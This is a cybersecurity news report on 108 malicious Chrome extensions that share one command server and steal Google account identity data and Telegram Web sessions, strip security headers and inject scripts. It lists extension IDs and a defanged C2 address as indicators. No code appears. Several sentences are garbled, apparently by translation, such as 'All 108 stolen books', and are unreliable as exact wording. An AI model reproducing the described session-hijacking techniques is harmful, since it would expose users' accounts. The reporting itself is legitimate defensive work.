108 Malicious Chrome Extensions Steal Google and Telegram Data, Affecting 20,000 Users
Cybersecurity researchers discovered a new campaign in which a collection of 108 Google Chrome extensions were found to communicate with a common command-and-control (C2) infrastructure with the aim of collecting user data and allowing browser-level abuse by injecting ads and malicious JavaScript code into every web page visited.
According to Socket, the extensions have been published under five different publisher identities – Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt – and have collectively accumulated around 20,000 installations on the Chrome Web Store.
“All 108 stolen books, user credentials, and browsing data from servers controlled by the same operator,” security researcher Kush Pandya said in an analysis.
Of these, 54 extensions steal Google account credentials via OAuth2, 45 extensions contain a universal backdoor that opens arbitrary URLs as soon as the browser is launched, and the rest engage in various malicious behaviors –
- Release Telegram Web sessions every 15 seconds
- Strip YouTube and TikTok security headers (ie Content Security Policy, X-Frame Options, and CORS) and add gambling and ad overlays.
- Add content scripts to every page the user visits
- Proxy all translation requests through the threat actor’s server
In an effort to borrow the official brand, the identified extensions pose as Telegram sidebar clients, slot machines and Keno games, YouTube and TikTok enhancements, text translation tools, and page utilities. The advertised performance is diverse, aiming to cast a wide net, while sharing the same background.
However, unbeknownst to users, malicious code running in the background captures session information, injects malicious scripts, and opens URLs of the attacker’s choosing.
Some of the mentioned extensions are listed below –
- Telegram Multi-account (ID: obifanppcpchlehkjipahhphbcbjekfa), which issues the user_auth token used by Telegram Web and sends data to a remote server. It can also overwrite Local Storage with actor-provided session data and force load the messaging app, effectively replacing the victim’s Telegram session with a session chosen by the threat actor.
- Telegram Web Client – Teleside (ID: mdcfennpfgkngnibjbpnpaafcjnhcjno), which strips Telegram’s security headers and inserts scripts to steal Telegram sessions.
- Formula Rush Racing Game (ID: akebbllmckjphjiojeiooidhnddnplj), which steals the identity of the user’s Google account the first time the victim clicks the login button. This includes information such as email, full name, profile picture URL, and Google account identifier.
“Five extensions use Chrome’s DeclarativeNetRequest API to strip security headers from target sites before the page loads,” Socket said. “All 108 malicious extensions share the same backend, hosted at 144.126.135[.]238.”
It is currently unknown who is behind the policy violation extensions. However, analysis of the source code revealed Russian-language comments throughout several additions.
Users who have installed any extensions are advised to remove them immediately and log out of all Telegram Web sessions on the Telegram mobile app.
